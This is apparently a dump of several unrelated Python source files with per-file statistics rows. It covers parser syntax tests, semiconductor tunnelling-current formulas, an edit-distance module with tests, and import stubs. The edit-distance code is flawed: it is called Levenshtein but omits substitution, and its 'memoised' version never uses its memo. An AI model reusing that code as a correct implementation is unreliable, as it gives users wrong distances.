parser.parse("a'/'b'/'c'>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/b'/'c'>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/c'>'d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/'c'>d'/'e'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'/'b'/'c'>'d'/e'")
def test_link_missing_link(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a>b/c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/>b/c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse(">b")
def test_link_missing_target(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b/c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>")
def test_link_extra_slash(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("/a>b/c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b/>c/d")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>/c/d")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>c/d/")
def test_link_extra_link(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>c/c>d/e")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a>b>c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>c/d>e")
def test_link_unexpected_token(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>c?")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>c:")
def test_match_simple(self):
parser = Parser()
instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address('uncomplicated_concept_name'),
Address('uncomplicated_concept_name2'), None, 2, instr[0])
instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:-1")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address('uncomplicated_concept_name'),
Address('uncomplicated_concept_name2'), None, -1, instr[0])
instr = parser.parse("uncomplicated_concept_name?uncomplicated_concept_name2:10")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address('uncomplicated_concept_name'),
Address('uncomplicated_concept_name2'), None, 10, instr[0])
def test_match_simple_quoted(self):
parser = Parser()
instr = parser.parse("'uncomplicated_concept_name'?'uncomplicated_concept_name2':2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address('uncomplicated_concept_name'),
Address('uncomplicated_concept_name2'), None, 2, instr[0])
def test_match_complex(self):
parser = Parser()
instr = parser.parse("\\27\\20\\2f\\3e\\3f\\3a-\\3b\\41?\\27\\20\\2f\\3e\\3f\\3a-\\3b\\42:2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address("' />?:-;A"),
Address("' />?:-;B"), None, 2, instr[0])
def test_match_complex_quoted(self):
parser = Parser()
instr = parser.parse("'\\27 />?:-;#\\41'?'\\27 />?:-;#\\42':2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address("' />?:-;#A"),
Address("' />?:-;#B"), None, 2, instr[0])
def test_match_path(self):
parser = Parser()
instr = parser.parse("a/b/c?d/e/f:2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address('a', ['b', 'c']),
Address('d', ['e', 'f']), None, 2, instr[0])
def test_match_complex_path(self):
parser = Parser()
instr = parser.parse("'\\27 />?:-;#\\41'/'\\27 />?:-;#\\42'?"
"\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43/\\27\\20\\2f\\3e\\3f\\3a-\\3b\\43:2")
assert_equal(1, len(instr))
self.assert_instruction(Instruction.MATCH,
Address("' />?:-;#A", ["' />?:-;#B"]),
Address("' />?:-;C", ["' />?:-;C"]), None, 2, instr[0])
def test_illegal_match(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b:")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?:")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("?a:")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b/?c:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?/b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b/:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b/c/:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b:c")
def test_double_slahes(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a//b>c')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a/b//c>d')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a/b>c//d')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a/b>c/d//e')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a//b?c:1')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a/b//c?d:1')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a?b//c:1')
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse('a?b/c//d:1')
def test_illegal_syntax(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("?")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse(":")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("/")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse(">")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("/")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a>b?:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?b>c:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a/b'>c")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/'b>c'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'b'")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("'a'b'?c:1")
def test_illegal_new(self):
parser = Parser()
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/a")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+/a>b")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+>b")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>b/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b>+/+")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("+?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a?+:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/+?b:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b?+:1")
with assert_raises_regexp(ValueError, 'Syntax error in statement on line 1'):
parser.parse("a/b?c/+:1")
| 44.139908 | 116 | 0.584671 | 2,340 | 19,245 | 4.64188 | 0.04359 | 0.098232 | 0.122629 | 0.147855 | 0.922298 | 0.91613 | 0.900571 | 0.893022 | 0.878567 | 0.875253 | 0 | 0.025727 | 0.268849 | 19,245 | 435 | 117 | 44.241379 | 0.746216 | 0 | 0 | 0.511976 | 0 | 0.011976 | 0.271395 | 0.07046 | 0 | 0 | 0 | 0 | 0.389222 | 1 | 0.095808 | false | 0 | 0.005988 | 0 | 0.10479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
03332dea7898b850727680027ecb447b28f9dd1b | 208 | py | Python | example.py | Spindel/enforce_typehints | 2f113f5a14e8c8456651b851243a67aa88c4ac47 | [
"MIT"
] | null | null | null | example.py | Spindel/enforce_typehints | 2f113f5a14e8c8456651b851243a67aa88c4ac47 | [
"MIT"
] | null | null | null | example.py | Spindel/enforce_typehints | 2f113f5a14e8c8456651b851243a67aa88c4ac47 | [
"MIT"
] | null | null | null | import typeforce.enforcing
print("Importing typing")
import typing
print("Importing pathlib")
import pathlib
print("Importing base64")
import base64
print("Importing bad_test_case")
import bad_test_case
| 13.866667 | 32 | 0.807692 | 27 | 208 | 6.074074 | 0.407407 | 0.341463 | 0.134146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021622 | 0.110577 | 208 | 14 | 33 | 14.857143 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.444444 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
037bfd0a26f23954ae1240c8c4330001f241f010 | 6,420 | py | Python | plugin/GenerationRate/BandToBandTunneling.py | Sunethan/APD-analyser | 30a190c763017017ce16e171b5bf641fda62a4b0 | [
"MIT"
] | 2 | 2019-06-18T15:14:26.000Z | 2019-08-17T16:42:02.000Z | plugin/GenerationRate/BandToBandTunneling.py | Sunethan/APD-analyser | 30a190c763017017ce16e171b5bf641fda62a4b0 | [
"MIT"
] | null | null | null | plugin/GenerationRate/BandToBandTunneling.py | Sunethan/APD-analyser | 30a190c763017017ce16e171b5bf641fda62a4b0 | [
"MIT"
] | 1 | 2021-08-25T12:38:22.000Z | 2021-08-25T12:38:22.000Z | import numpy as np
import physics as phys
import utils
q = 1.6e-19 # [C]
me = 9.11e-31 # [kg]
hbar = 1.054e-34 # [J-s]
eps_InP = 12.5 * 8.85e-14 # [F/cm]
eps_InGaAs = 13.9 * 8.85e-14 # [F/cm] In 0.53 Ga 0.47 As
Eg_InP = 1.35 * q # [J]
Eg_InGaAs = 0.742 * q # [J] # TCAD 應該是 0.7428
def Jt_E_InGaAs(F, ND):
# 前置參數(來自 Jt_InGaAs)
mr = 1
ratio = 0.06
alpha = 1
gamma = 1 # [Edx ~ E * (W * gamma)] 之前不知為何設定為 0.5,目前覺得這個修正 gamma 應該不需存在。
F = F * 100 # 把單位從 V/cm 轉成 V/m
# 其他參數
me = 9.11e-31 # [kg]
mc = 0.04 * me # [kg]
mv = 0.04 * me # [kg]
# meff = 2 * mc * mv / (mc + mv) * mr # [kg]
meff = 0.04 * mr * me
# Eg = 0.718 * q # [J] [From TCAD]
Eg = Eg_InGaAs # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
w = ratio * eps_InGaAs / (q * ND)
TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (
q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
return TunnelingCurrent * 1e-4 # [A / cm^2]
def Jt_InGaAs(V, ND, alpha, mr, ratio):
# (J.J. Liou 1980)
gamma = 1 # [Edx ~ E * (W * gamma)] 之前不知為何設定為 0.5,目前覺得這個修正 gamma 應該不需存在。
me = 9.11e-31 # [kg]
mc = 0.04 * me # [kg]
mv = 0.04 * me # [kg]
# meff = 2 * mc * mv / (mc + mv) * mr # [kg]
meff = 0.04 * mr * me
# Eg = 0.718 * q # [J] [From TCAD]
Eg = Eg_InGaAs # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
F = (2 * q * V * ND / eps_InGaAs) ** 0.5 * 100 # [V/m]
w = ratio * (2 * eps_InGaAs * V / (q * ND)) ** 0.5 / 100 # [m]
hbar = 1.054e-34 # [J-s]
#print('A: %.3e, TCAD: %.3e ' % ((2 * meff / Eg) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2), 7.271e19))
#print('B: %.3e, TCAD: %.3e' % (np.pi / (4 * q * hbar) * (2 * meff * Eg ** 3) ** 0.5, 5.14e6))
A_TCAD = 7.271e19 * 1e4 # [m-2s-1V-2]
B_TCAD = 5.14e6 * 100 # [V/m]
TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
TunnelingCurrent_TCAD = A_TCAD * q * w * F ** (alpha + 1) * np.exp(- B_TCAD / F) * 1e-4 # [A/cm2]
return TunnelingCurrent * 1e-4 # [A / cm^2]
def Jt_InP(V, ND, alpha, mr, ratio):
# (J.J. Liou 1980)
gamma = 1 # [Edx ~ E * (W * gamma)] 之前不知為何設定為 0.5,目前覺得這個修正 gamma 應該不需存在。
me = 9.11e-31 # [kg]
mc = 0.1149 * me # [kg] 正確是 0.1149,但 Ando 似乎是 0.065
mv = 0.1149 * me # [kg]
#meff = 0.1149 * mr * me
meff = 2 * mc * mv / (mc + mv)
# Eg = 0.718 * q # [J] [From TCAD]
Eg = Eg_InP # [J] [https://www.batop.de/information/Eg_InGaAs.html#]
F = (2 * q * V * ND / eps_InP) ** 0.5 * 100 # [V/m]
w = ratio * (2 * eps_InP * V / (q * ND)) ** 0.5 / 100 # [m]
hbar = 1.054e-34 # [J-s]
#print((2 * meff / Eg) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) * 0.4)
TunnelingCurrent = (2 * meff / Eg) ** 0.5 * (q ** 3 * F ** (alpha + 1) * w * gamma / ((2 * np.pi) ** 3 * hbar ** 2)) * \
np.exp(- np.pi / (4 * q * hbar * F) * (2 * meff * Eg ** 3) ** 0.5)
return TunnelingCurrent * 1e-4 # [A / cm^2]
def G_BTB_InGaAs(E_Vcm, T, mr):
if type(E_Vcm) is np.ndarray:
G = []
for F in E_Vcm:
if F == 0:
G.append(0)
else:
E = F * 100
meff = 0.04 * mr * me
# TCAD: A = 7.271e19 [cm-2s-1V-2]
A = (2 * meff / (q * phys.Eg_InGaAs(T))) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) # [m-2s-1V-2]
# A = 7.271e19 * 1e4
# TCAD: B = 5.14e6 [V/cm]
B = np.pi / (4 * q * hbar) * (2 * meff * (q * phys.Eg_InGaAs(T)) ** 3) ** 0.5 # [V/m]
# B = 5.14e6 * 100 # [V/m]
G.append(A * E ** 2 * np.exp(- B / E))
return np.asarray(G)
else:
if E_Vcm == 0:
return 0
else:
E = E_Vcm * 100 # [V/m]
meff = 0.04 * mr * me
# TCAD: A = 7.271e19 [cm-2s-1V-2]
A = (2 * meff / phys.Eg_InGaAs(T)) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) # [m-2s-1V-2]
# A = 7.271e19 * 1e4
# TCAD: B = 5.14e6 [V/cm]
B = np.pi / (4 * q * hbar) * (2 * meff * phys.Eg_InGaAs(T) ** 3) ** 0.5 # [V/m]
# B = 5.14e6 * 100 # [V/M]
return A * E ** 2 * np.exp(- B / E) # E[V/m] ---> G = [m-3s-1]
def G_BTB_InP(E_Vcm, T, m_ratio):
if type(E_Vcm) is np.ndarray:
G = []
for F in E_Vcm:
if F == 0:
G.append(0)
else:
E = F * 100
meff = m_ratio * me # 0.1149 * me
# TCAD: A = 7.271e19 [cm-2s-1V-2]
A = (2 * meff / (q * phys.Eg_InP(T))) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) # [m-2s-1V-2]
# TCAD: B = 5.14e6 [V/cm]
B = np.pi / (4 * q * hbar) * (2 * meff * (q * phys.Eg_InP(T)) ** 3) ** 0.5 # [V/m]
G.append(A * E ** 2 * np.exp(- B / E)) # E[V/m] ---> G = [m-3s-1]
return np.asarray(G)
else:
if E_Vcm == 0:
return 0
else:
E = E_Vcm * 100
meff = m_ratio * me # 0.1149 * me
# TCAD: A = 7.271e19 [cm-2s-1V-2]
A = (2 * meff / phys.Eg_InP(T)) ** 0.5 * q ** 2 / ((2 * np.pi) ** 3 * hbar ** 2) # [m-2s-1V-2]
# TCAD: B = 5.14e6 [V/cm]
B = np.pi / (4 * q * hbar) * (2 * meff * phys.Eg_InP(T) ** 3) ** 0.5 # [V/m]
return A * E ** 2 * np.exp(- B / E) # E[V/m] ---> G = [m-3s-1]
def J_BTB_InP(x_cm_array, E_Vcm_array, T, m_ratio):
return utils.ydx(x_cm_array, q * G_BTB_InP(E_Vcm_array, T, m_ratio), 0, len(x_cm_array) - 1)
def J_BTB_InGaAs(x_cm_array, E_Vcm_array, T, m_ratio):
return utils.ydx(x_cm_array, q * G_BTB_InGaAs(E_Vcm_array, T, m_ratio / 0.04), 0, len(x_cm_array) - 1)
def Em_InGaAs(V, ND):
F = (2 * q * V * ND / eps_InGaAs) ** 0.5 # [V/cm]
return F
def Em_InP(V, ND):
F = (2 * q * V * ND / eps_InP) ** 0.5 # [V/cm]
return F
def W_InGaAs(V, ND):
w = (2 * eps_InGaAs * V / (q * ND)) ** 0.5
return w # [cm]
def W_InP(V, ND):
w = (2 * eps_InP * V / (q * ND)) ** 0.5
return w # [cm]
| 37.988166 | 124 | 0.42866 | 1,125 | 6,420 | 2.366222 | 0.109333 | 0.021037 | 0.023666 | 0.020286 | 0.833959 | 0.803907 | 0.792261 | 0.752442 | 0.729151 | 0.675056 | 0 | 0.121346 | 0.365888 | 6,420 | 168 | 125 | 38.214286 | 0.532547 | 0.258879 | 0 | 0.556522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095652 | false | 0 | 0.026087 | 0.017391 | 0.252174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3009ac102aeadfca8f7c13d79794daa4d4e4cf20 | 111 | py | Python | modules/adapters/util/__init__.py | ta946/sublime_debugger | 7da77f120399b162ed5f23101294bc74540ca411 | [
"MIT"
] | 47 | 2018-10-28T09:09:39.000Z | 2019-06-29T12:47:17.000Z | modules/adapters/util/__init__.py | ta946/sublime_debugger | 7da77f120399b162ed5f23101294bc74540ca411 | [
"MIT"
] | 18 | 2018-10-28T20:30:38.000Z | 2019-04-28T17:24:28.000Z | modules/adapters/util/__init__.py | ta946/sublime_debugger | 7da77f120399b162ed5f23101294bc74540ca411 | [
"MIT"
] | 7 | 2018-10-28T18:43:02.000Z | 2019-04-25T14:29:48.000Z | from .dependencies import get_and_warn_require_node
from .import git
from .import openvsx
from .import vscode
| 18.5 | 51 | 0.837838 | 17 | 111 | 5.235294 | 0.647059 | 0.337079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126126 | 111 | 5 | 52 | 22.2 | 0.917526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
301045e2e0812017cc3f74aef48b58cdc5c13bc4 | 4,399 | py | Python | Hired/Practice/edit_distances.py | royadityak94/Interview | 40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f | [
"MIT"
] | null | null | null | Hired/Practice/edit_distances.py | royadityak94/Interview | 40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f | [
"MIT"
] | null | null | null | Hired/Practice/edit_distances.py | royadityak94/Interview | 40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f | [
"MIT"
] | null | null | null | import unittest
def calculate_levenshtein_distance(str1, str2):
if str1 and not str2:
return len(str1)
elif not str1 and str2:
return len(str2)
elif not str1 and not str2:
return 0
return calculate_levenshtein_distance_recursive(str1, str2, len(str1), len(str2))
def calculate_levenshtein_distance_recursive(str1, str2, i, j):
if i == 0:
return j
elif j == 0:
return i
else:
if str1[i-1] == str2[j-1]:
return calculate_levenshtein_distance_recursive(str1, str2, i-1, j-1)
else:
return 1 + min(
calculate_levenshtein_distance_recursive(str1, str2, i-1, j),
calculate_levenshtein_distance_recursive(str1, str2, i, j-1))
def calculate_levenshtein_distance_td_dp(str1, str2):
if str1 and not str2:
return len(str1)
elif not str1 and str2:
return len(str2)
elif not str1 and not str2:
return 0
td = [[-1 for j in range(len(str2))] for i in range(len(str1))]
return calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, len(str1), len(str2))
def calculate_levenshtein_distance_td_dp_recursive(td, str1, str2, i, j):
if i == 0:
return j
elif j == 0:
return i
else:
if td[i-1][j-1] == -1:
if str1[i-1] == str2[j-1]:
td[i-1][j-1] = calculate_levenshtein_distance_recursive(str1, str2, i-1, j-1)
else:
td[i-1][j-1] = 1 + min(
calculate_levenshtein_distance_recursive(str1, str2, i-1, j),
calculate_levenshtein_distance_recursive(str1, str2, i, j-1))
return td[i-1][j-1]
def calculate_levenshtein_distance_dp(str1, str2):
if str1 and not str2:
return len(str1)
elif not str1 and str2:
return len(str2)
elif not str1 and not str2:
return 0
td = [[-1 for j in range(len(str2)+1)] for i in range(len(str1)+1)]
# Filling up column - 0, i.e. edit distance = j when i=0
for j in range(len(str2)+1):
td[0][j] = j
# Filling up row - 0, i.e. edit distance = i when j=0
for i in range(len(str1)+1):
td[i][0] = i
# Populating all other subsets
for i in range(1, len(str1)+1):
for j in range(1, len(str2)+1):
if str1[i-1] == str2[j-1]:
td[i][j] = td[i-1][j-1]
else:
td[i][j] = 1 + min(td[i-1][j], td[i][j-1])
return td[len(str1)][len(str2)]
class Test(unittest.TestCase):
def setup(self):
pass
def teardown(self):
pass
def test_recursion(self):
# Using plain recursion
self.assertEqual(calculate_levenshtein_distance("dog", "frog"), 3)
self.assertEqual(calculate_levenshtein_distance("some", "some"), 0)
self.assertEqual(calculate_levenshtein_distance("some", "thing"), 9)
self.assertEqual(calculate_levenshtein_distance("", ""), 0)
self.assertEqual(calculate_levenshtein_distance("", "blue"), 4)
self.assertEqual(calculate_levenshtein_distance("blue", ""), 4)
def test_top_down_dp(self):
# Using top down Dynamic Programming
self.assertEqual(calculate_levenshtein_distance_td_dp("dog", "frog"), 3)
self.assertEqual(calculate_levenshtein_distance_td_dp("some", "some"), 0)
self.assertEqual(calculate_levenshtein_distance_td_dp("some", "thing"), 9)
self.assertEqual(calculate_levenshtein_distance_td_dp("", ""), 0)
self.assertEqual(calculate_levenshtein_distance_td_dp("", "blue"), 4)
self.assertEqual(calculate_levenshtein_distance_td_dp("blue", ""), 4)
def test_bottom_up_dp(self):
#Using bottom up Dynamic Programming
self.assertEqual(calculate_levenshtein_distance_dp("dog", "frog"), 3)
self.assertEqual(calculate_levenshtein_distance_dp("some", "some"), 0)
self.assertEqual(calculate_levenshtein_distance_dp("some", "thing"), 9)
self.assertEqual(calculate_levenshtein_distance_dp("", ""), 0)
self.assertEqual(calculate_levenshtein_distance_dp("", "blue"), 4)
self.assertEqual(calculate_levenshtein_distance_dp("blue", ""), 4)
def main():
unittest.main()
main()
| 37.279661 | 96 | 0.605138 | 591 | 4,399 | 4.328257 | 0.104907 | 0.242377 | 0.339328 | 0.246286 | 0.853401 | 0.810008 | 0.77326 | 0.632525 | 0.526974 | 0.336982 | 0 | 0.044145 | 0.273926 | 4,399 | 117 | 97 | 37.598291 | 0.756731 | 0.051603 | 0 | 0.434783 | 0 | 0 | 0.023715 | 0 | 0 | 0 | 0 | 0 | 0.195652 | 1 | 0.119565 | false | 0.021739 | 0.01087 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
302f647d78b9d115c00ae8307070be6976b11aff | 23 | py | Python | spikeforest/spikesorters/yass/__init__.py | mhhennig/spikeforest | 5b4507ead724af3de0be5d48a3b23aaedb0be170 | [
"Apache-2.0"
] | 1 | 2021-09-23T01:07:19.000Z | 2021-09-23T01:07:19.000Z | spikeforest/spikesorters/yass/__init__.py | mhhennig/spikeforest | 5b4507ead724af3de0be5d48a3b23aaedb0be170 | [
"Apache-2.0"
] | null | null | null | spikeforest/spikesorters/yass/__init__.py | mhhennig/spikeforest | 5b4507ead724af3de0be5d48a3b23aaedb0be170 | [
"Apache-2.0"
] | 1 | 2021-09-23T01:07:21.000Z | 2021-09-23T01:07:21.000Z | from .yass import YASS
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3064b035a6aa0da41cfc937144293ec5a02df007 | 26 | py | Python | __init__.py | Shardj/py-gangue | d02e4e0b0c85069cb4ca9c507be77ecaac51dd73 | [
"MIT"
] | null | null | null | __init__.py | Shardj/py-gangue | d02e4e0b0c85069cb4ca9c507be77ecaac51dd73 | [
"MIT"
] | null | null | null | __init__.py | Shardj/py-gangue | d02e4e0b0c85069cb4ca9c507be77ecaac51dd73 | [
"MIT"
] | null | null | null | from core import packages
| 13 | 25 | 0.846154 | 4 | 26 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3064cbed2ea89bec8a69cf3bd0003fe6d4b29173 | 930 | py | Python | temboo/core/Library/Stripe/Charges/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/Stripe/Charges/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/Stripe/Charges/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.Stripe.Charges.CreateNewChargeForExistingCustomer import CreateNewChargeForExistingCustomer, CreateNewChargeForExistingCustomerInputSet, CreateNewChargeForExistingCustomerResultSet, CreateNewChargeForExistingCustomerChoreographyExecution
